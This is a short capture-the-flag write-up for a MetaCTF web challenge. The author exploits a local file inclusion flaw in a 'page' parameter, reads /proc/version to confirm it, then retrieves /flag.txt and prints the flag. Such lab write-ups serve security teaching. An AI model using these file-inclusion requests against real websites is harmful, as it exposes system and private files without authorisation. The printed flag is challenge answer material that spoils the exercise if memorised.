Trail Blazer

description

I just made this cool website that acts as your own personal web browser!

Why is this cool? Well… I wrote it! Anyway, check it out and let me know if there are any features you would like to see added!

Hint: You just need to search for /flag.txt.

writeup

upon opening the website in my browser i am presented with the following form:

If i try to input any url e.g. google.com I get redirected to this page: http://host3.metaproblems.com:4110/blaze.php?page=google.com

But I get an error:

1

Could not open file.

So it looks like the program is including an actual single file.

Let’s try something like: /proc/version

The GET request would look like this:

1

http://host3.metaproblems.com:4110/blaze.php?page=/proc/version

And I get the following response:

1

Linux version 4.19.0-22-cloud-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.260-1 (2022-09-29)

So that confirms that the LFI technique is in fact working.

Since the hint for this challenge says: You just need to search for /flag.txt

We can just get the flag like so:

1
2
3

http://host3.metaproblems.com:4110/blaze.php?page=/flag.txt

MetaCTF{blazing_paths_will_blaze_your_app_t00}